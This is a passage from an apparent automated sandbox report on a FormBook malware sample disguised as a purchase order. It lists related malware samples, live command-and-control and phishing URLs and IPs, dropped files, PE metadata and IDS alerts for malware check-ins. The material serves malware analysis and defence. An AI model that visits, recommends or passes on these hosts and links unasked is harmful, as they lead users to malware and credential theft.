                                                              • www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp
                                                              Petronas quotation request.exeGet hashmaliciousFormBookBrowse
                                                              • www.chinaen.org/zi4g/
                                                              Shipping Documemt.vbsGet hashmaliciousLokibotBrowse
                                                              • werdotx.shop/Devil/PWS/fre.php
                                                              Quotes updates request.exeGet hashmaliciousFormBookBrowse
                                                              • www.1win-moldovia.fun/1g7m/
                                                              PO-001.exeGet hashmaliciousFormBookBrowse
                                                              • www.1win-moldovia.fun/kslt/
                                                              PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                              • www.rtpngk.xyz/876i/
                                                              LOL and profile.exeGet hashmaliciousFormBookBrowse
                                                              • www.chinaen.org/zi4g/
                                                              QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • filetransfer.io/data-package/STiUOnZN/download
                                                              EX778415591042.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                              • trvtest.click/RF/PWS/fre.php

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              www.longfilsalphonse.netPO-000001488.exeGet hashmaliciousFormBookBrowse
                                                              • 52.223.13.41
                                                              PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                              • 52.223.13.41
                                                              DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                                              • 52.223.13.41
                                                              file.exeGet hashmaliciousFormBookBrowse
                                                              • 52.223.13.41
                                                              www.cc101.proPO-000001488.exeGet hashmaliciousFormBookBrowse
                                                              • 188.114.97.3
                                                              PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                              • 188.114.97.3
                                                              PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                              • 188.114.96.3
                                                              xzwp.g.zxy-cname.comRFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                              • 52.187.43.73
                                                              PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                              • 52.187.42.58
                                                              List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 13.76.137.44
                                                              Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                                                              • 52.230.28.86
                                                              SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                              • 13.76.139.81

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              MICROSOFT-CORP-MSN-AS-BLOCKUSNEW ORDER.xlsGet hashmaliciousUnknownBrowse
                                                              • 13.107.253.42
                                                              https://www.dropbox.com/l/AACCJz_U-ZDLo7IXCzEFAx8aUAOQwxagfyUGet hashmaliciousHTMLPhisherBrowse
                                                              • 13.107.42.14
                                                              Document.xlsGet hashmaliciousUnknownBrowse
                                                              • 13.107.253.57
                                                              L24027490-Modello incendio e altri rami [NEW](Elaborato finale)-23092024.xlsGet hashmaliciousUnknownBrowse
                                                              • 13.107.246.60
                                                              http://pub-ec6ee4fc5ef04d5a82d83c24992db464.r2.dev/poppps.htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 13.107.246.60
                                                              http://pub-44672067528c462ea47a10cc0c07ac29.r2.dev/faculty.htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 13.107.246.42
                                                              http://pub-3424228f58ac440c9523afb01100ed68.r2.dev/gold.htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 13.107.246.45
                                                              http://juno-online7373h.wixsite.com/my-site/Get hashmaliciousUnknownBrowse
                                                              • 150.171.30.10
                                                              http://dalesisson.wixsite.com/my-site/Get hashmaliciousUnknownBrowse
                                                              • 150.171.27.10
                                                              http://pub-f7c4e07e581b476e9fb4f4b237e77a89.r2.dev/IndexProject09XX09n/008XnbBse12.htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 13.107.246.60
                                                              CLOUDFLARENETUSInquiry List.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              RFQ urrgently.exeGet hashmaliciousFormBookBrowse
                                                              • 104.21.64.108
                                                              NEW ORDER.xlsGet hashmaliciousUnknownBrowse
                                                              • 188.114.96.3
                                                              https://www.dropbox.com/l/AACCJz_U-ZDLo7IXCzEFAx8aUAOQwxagfyUGet hashmaliciousHTMLPhisherBrowse
                                                              • 172.64.150.44
                                                              HSBC_Payment.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                              • 104.21.35.232
                                                              Document.xlsGet hashmaliciousUnknownBrowse
                                                              • 188.114.97.3
                                                              TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                              • 188.114.96.3
                                                              MCB_09252024.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              NEW ORDER.xlsGet hashmaliciousUnknownBrowse
                                                              • 188.114.96.3
                                                              COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 104.26.12.205
                                                              HAWKHOSTCARFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                              • 198.252.106.191
                                                              PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                              • 198.252.106.191
                                                              BL Draft-Invoice-Packing list-Shipping Document.pif.exeGet hashmaliciousFormBookBrowse
                                                              • 198.252.106.136
                                                              PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                              • 198.252.106.191
                                                              file No83293 PO & Specification.gz.exeGet hashmaliciousFormBookBrowse
                                                              • 198.252.106.241
                                                              vm6XYZzWOd.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                                              • 198.252.105.116
                                                              1AIemYSAZy.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                                                              • 198.252.102.119
                                                              ENEDGCErLu.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc, SystemBCBrowse
                                                              • 198.252.102.119
                                                              OShRqF6jNV.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, SystemBC, XmrigBrowse
                                                              • 198.252.102.119
                                                              fRhC9IDQga.exeGet hashmaliciousSmokeLoader, VidarBrowse
                                                              • 198.252.102.119
                                                              MULTIBAND-NEWHOPEUSPO-000001488.exeGet hashmaliciousFormBookBrowse
                                                              • 209.74.95.29
                                                              List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 209.74.95.29
                                                              PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                              • 209.74.95.29
                                                              PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                              • 209.74.95.29
                                                              Untitled.emlGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                              • 209.74.66.140
                                                              Untitled.emlGet hashmaliciousUnknownBrowse
                                                              • 209.74.66.140
                                                              EF520_B18Payment_2600_D3781_N3895_L1029_H482_X4782_E3819.exeGet hashmaliciousUnknownBrowse
                                                              • 209.74.95.146
                                                              https://lookerstudio.google.com/s/u2hbu8O7xHgGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                              • 209.74.66.141
                                                              ibero.batGet hashmaliciousSilverRatBrowse
                                                              • 209.74.95.136
                                                              CY51PaymentAUG-38122-507-783-17531I-39UW-J471-3017-3C762-M732.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                              • 209.74.95.146
                                                              INTERQGMOInternetIncJPhttps://flowcode.com/p/epjMkCwdtPGet hashmaliciousUnknownBrowse
                                                              • 118.27.125.197
                                                              Audio playback00_05-30-00000.htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 150.95.219.86
                                                              https://flowto.it/epjMkCwdtPGet hashmaliciousUnknownBrowse
                                                              • 118.27.125.197
                                                              https://flowcode.com/p/epjMkCwdtPGet hashmaliciousUnknownBrowse
                                                              • 118.27.125.197
                                                              ORDER_1105-19-24-3537.pdf.exeGet hashmaliciousFormBookBrowse
                                                              • 150.95.255.38
                                                              Enquiry.exeGet hashmaliciousFormBookBrowse
                                                              • 133.130.35.90
                                                              https://hachidori87.com/wp-content/Magenta/MagentaGet hashmaliciousPhisherBrowse
                                                              • 163.44.185.223
                                                              tmNB51skaY.elfGet hashmaliciousMiraiBrowse
                                                              • 157.7.100.18
                                                              PASU5160894680 DOCS.scr.exeGet hashmaliciousFormBookBrowse
                                                              • 160.251.148.115
                                                              https://smex-ctp.trendmicro.com/wis/clicktime/v1/query?url=http%3a%2f%2f3d1.gmobb.jp%2fdcm299ccyag4e%2fgov&umid=c9da0305-3df1-4ca9-b55d-4eb1dc21d559&auth=e8718e3df01d3f6f6a26ecc437e1fe16569b02b3-ce2cb0a9999be4b21ec568df281766cb7c88743eGet hashmaliciousPhisherBrowse
                                                              • 133.130.64.224

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO23100072.exe.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\PO23100072.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1216
                                                              Entropy (8bit):5.34331486778365
                                                              Encrypted:false
                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                              Malicious:true
                                                              Reputation:high, very likely benign file
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):2232
                                                              Entropy (8bit):5.380805901110357
                                                              Encrypted:false
                                                              SSDEEP:48:lylWSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMugeC/ZM0Uyus:lGLHxvCZfIfSKRHmOugw1s
                                                              MD5:A6C11D5EB8FF113F746691904CC1C285
                                                              SHA1:85159530ED2933460F7D0793776D5FC2B1FAE500
                                                              SHA-256:7C1AA4858AF77BB1C1ADA78CE4816C4178A74E0A9CCFDB1E7F6A6FA3A08D6A1B
                                                              SHA-512:3460404875D62BD2318704741E443A0EF38352E977EEEE5EC7C39E6FCE9596D7E0F0A401780993697AE21FB68E2B9A9AF3A662667FB9EA48D7DD8E5B6148AF1E
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                              C:\Users\user\AppData\Local\Temp\A34E618M

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\userinit.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.1209886597424439
                                                              Encrypted:false
                                                              SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                              MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                              SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                              SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                              SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0axffaws.mpt.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34qudxy3.fwx.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4tefswh.sui.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqk4ot4k.0ij.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.857918059400789
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              • DOS Executable Generic (2002/1) 0.01%
                                                              File name:PO23100072.exe
                                                              File size:695'296 bytes
                                                              MD5:b2a43d44c753d573caeb9160cb1da4a2
                                                              SHA1:873200a52f2bfd05cf5b708d87f8179486464fab
                                                              SHA256:405f4016376e02c97d8509d2627c7bb3be0583f46aa5a1ea57d96252b759f1f9
                                                              SHA512:944428969923998604a36d4a30da190c95e35d7e59fa474377c4312f2d5481435cbd8d4225e2e44766f7224f5aa95cbe1b916f1c5d655b3366d537074e6cb076
                                                              SSDEEP:12288:Wd058bQb7S2LSzV8sKxId7L8+g4yYGIU9FpJ8feieJ4ElZXuiFP96Z9V/:H2IOiSzV8s048+gwd8JpiiHbF0T
                                                              TLSH:D2E412802119E913C1865BF45832E2F817BA9DEDAD16C30BDBDA3DEF7D3A7421581392
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v.................0.................. ........@.. ....................................@................................

                                                              File Icon

                                                              Icon Hash:00928e8e8686b000

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x4ab0e2
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x9BF3D476 [Thu Nov 28 23:08:38 2052 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                              Entrypoint Preview

                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xab08e0x4f.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xac0000x5a4.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xae0000xc.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xa9f2c0x70.text
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000xa90e80xa9200781454ba697888eb6dc04d4f9940df05False0.9444795708610495data7.864814644611974IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rsrc0xac0000x5a40x600f0f749a399b413812afb6a033d425f10False0.4205729166666667data4.0826325181184275IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0xae0000xc0x2007e87134e620355429cab8bfc0e9fba10False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_VERSION0xac0900x314data0.4352791878172589
                                                              RT_MANIFEST0xac3b40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                              Imports

                                                              DLLImport
                                                              mscoree.dll_CorExeMain

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-09-25T09:16:01.206157+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849712188.114.96.380TCP
                                                              2024-09-25T09:16:24.413193+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849717199.59.243.22780TCP
                                                              2024-09-25T09:16:37.932974+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849722198.252.106.19180TCP
                                                              2024-09-25T09:16:51.106407+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.8497273.33.130.19080TCP
                                                              2024-09-25T09:17:04.515185+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849731148.251.114.23380TCP
                                                              2024-09-25T09:17:17.913750+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849735209.74.95.2980TCP
                                                              2024-09-25T09:17:31.111467+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849739199.59.243.22780TCP
                                                              2024-09-25T09:17:44.301084+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.8497433.33.130.19080TCP
                                                              2024-09-25T09:18:05.939548+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84974752.223.13.4180TCP
                                                              2024-09-25T09:18:19.934267+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84975138.47.232.14480TCP
                                                              2024-09-25T09:18:33.704910+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84975552.230.28.8680TCP
                                                              2024-09-25T09:18:48.608515+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849759133.130.35.9080TCP
                                                              2024-09-25T09:19:02.055491+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84976352.223.13.4180TCP
                                                              2024-09-25T09:19:15.269086+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84976784.32.84.3280TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 25, 2024 09:15:59.166403055 CEST4971280192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:15:59.171304941 CEST8049712188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:15:59.171508074 CEST4971280192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:15:59.182904005 CEST4971280192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:15:59.187782049 CEST8049712188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:16:01.205826044 CEST8049712188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:16:01.205859900 CEST8049712188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:16:01.205873013 CEST8049712188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:16:01.205887079 CEST8049712188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:16:01.205904961 CEST8049712188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:16:01.205921888 CEST8049712188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:16:01.206156969 CEST4971280192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:16:01.206156969 CEST4971280192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:16:01.213696003 CEST4971280192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:16:01.218645096 CEST8049712188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:16:16.301925898 CEST4971480192.168.2.8199.59.243.227
                                                              Sep 25, 2024 09:16:16.306890011 CEST8049714199.59.243.227192.168.2.8
                                                              Sep 25, 2024 09:16:16.306972980 CEST4971480192.168.2.8199.59.243.227
